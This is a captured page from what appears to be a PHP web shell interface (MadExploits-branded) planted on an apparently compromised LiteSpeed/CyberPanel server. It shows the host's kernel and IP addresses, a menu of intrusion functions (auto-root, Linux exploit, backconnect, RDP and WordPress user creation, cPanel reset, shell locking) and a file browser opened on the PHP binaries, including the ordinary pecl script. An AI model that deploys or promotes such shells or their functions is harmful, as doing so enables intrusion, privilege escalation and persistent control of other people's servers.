Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
lsphp80 /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
lsphp
15.3
MB
-rwxr-xr-x
pear
888
B
-rwxr-xr-x
peardev
909
B
-rwxr-xr-x
pecl
822
B
-rwxr-xr-x
phar8.0
15.04
KB
-rwxr-xr-x
phar8.0.phar
15.04
KB
-rwxr-xr-x
php
15.4
MB
-rwxr-xr-x
php-config
5.02
KB
-rwxr-xr-x
php-config8.0
5.02
KB
-rwxr-xr-x
php-helper
4.65
KB
-rwxr-xr-x
php-maintscript-helper
9.55
KB
-rwxr-xr-x
php8.0
15.4
MB
-rwxr-xr-x
phpdismod
7.2
KB
-rwxr-xr-x
phpenmod
7.2
KB
-rwxr-xr-x
phpize
4.46
KB
-rwxr-xr-x
phpize8.0
4.46
KB
-rwxr-xr-x
phpquery
6.23
KB
-rwxr-xr-x
sessionclean
2.77
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pecl
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/usr/local/lsws/lsphp80/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/usr/local/lsws/lsphp80/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/usr/local/lsws/lsphp80/share/php" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/usr/local/lsws/lsphp80/share/php" INCARG="-d include_path=/usr/local/lsws/lsphp80/share/php" fi fi exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d safe_mode=0 -d register_argc_argv="On" $INCDIR/peclcmd.php "$@"
Close